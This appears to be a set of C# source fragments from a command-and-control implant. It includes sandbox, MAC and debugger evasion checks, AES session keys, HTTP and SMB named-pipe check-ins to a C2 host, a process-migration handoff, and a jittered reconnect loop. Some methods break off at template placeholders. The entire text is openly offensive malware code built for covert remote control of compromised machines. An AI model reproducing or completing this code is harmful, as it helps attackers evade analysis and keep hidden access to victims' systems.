public static void Execute(string json, string cookie, NamedPipeClientStream pipe) { if (containsSandboxArtifacts() || isBadMac() || isDebugged()) { return; } byte[] aeskey; byte[] aesiv; string agentid = ""; Thread servert = null; bool smbstarted = false; bool managed = injectionmanaged; List <string> smblisteners = new List <string>(); Dictionary <string, List <Core.Utility.TaskMsg> > commands = new Dictionary <string, List <Core.Utility.TaskMsg> >(); Random r = new Random(); Core.Utility.AgentIdMsg agentidmsg = Core.Utility.GetAgentId(json); agentid = agentidmsg.agentid; aeskey = Convert.FromBase64String(agentidmsg.sessionkey); aesiv = Convert.FromBase64String(agentidmsg.sessioniv); Core.Utility.CookiedWebClient wc = new Core.Utility.CookiedWebClient(); WebHeaderCollection webHeaderCollection = new WebHeaderCollection(); webHeaderCollection.Add(HttpRequestHeader.UserAgent, "#USERAGENT#"); #HEADERS #
public void LoadAndRun(string[] arguments) { string json = Encoding.Default.GetString(Convert.FromBase64String(arguments[0])); Core.Utility.AgentState agentState = new JavaScriptSerializer().Deserialize <Core.Utility.AgentState>(json); Random r = new Random(); agentid = agentState.Agentid; aeskey = Convert.FromBase64String(agentState.sessionkey); aesiv = Convert.FromBase64String(agentState.sessioniv); if (agentState.pipename != null) { //Crete pipe client this.pipe = CreatePipeClient(agentState.pipename); } else { this.wc = CreateWebClient(agentState.cookie, host); } //Send response message to task request sent to preceding process //Need to create a dirty Task cause Instanceid need to be set Core.Utility.TaskMsg task = new Core.Utility.TaskMsg(); task.Instanceid = agentState.RequestInstanceid; Execution.CommandExecuter commandOutuput = new Execution.CommandExecuter(task, this); string output = string.Format("[*] Agent successfully migrated to {0}", Process.GetCurrentProcess().ProcessName); commandOutuput.SendResponse(output); Run(); }
private Core.Utility.CookiedWebClient CreateWebClient(string cookie, string host) { Core.Utility.CookiedWebClient wc = new Core.Utility.CookiedWebClient(); WebHeaderCollection webHeaderCollection = new WebHeaderCollection(); webHeaderCollection.Add(HttpRequestHeader.UserAgent, "#USERAGENT#"); #HEADERS #
public Worker(string json, string cookie, NamedPipeClientStream pipe) { Random r = new Random(); this.pipe = pipe; Core.Utility.AgentIdMsg agentidmsg = Core.Utility.GetAgentId(json); agentid = agentidmsg.agentid; aeskey = Convert.FromBase64String(agentidmsg.sessionkey); aesiv = Convert.FromBase64String(agentidmsg.sessioniv); this.wc = CreateWebClient(cookie, host); string rpaddress = String.Format("https://{0}:{1}/{2}", host, port, pagepost[new Random().Next(pagepost.Length)]); if (this.pipe != null) { Core.Utility.SendCheckinSMB(agentid, aeskey, aesiv, this.pipe); } else { Core.Utility.SendCheckinHttp(agentid, aeskey, aesiv, rpaddress, param, wc); } }
private void Reconnect(string agentid, byte[] aeskey, byte[] aesiv, string param, Core.Utility.CookiedWebClient wc) { bool connected = false; while (!connected) { try { string rpaddress = String.Format("https://{0}:{1}/{2}", host, port, pagepost[new Random().Next(pagepost.Length)]); if (this.pipe == null) { Core.Utility.SendCheckinHttp(agentid, aeskey, aesiv, rpaddress, param, wc); connected = true; } } catch (Exception) { } //More delay here? int rInt = GetDelay(); Thread.Sleep(rInt * 1000); } }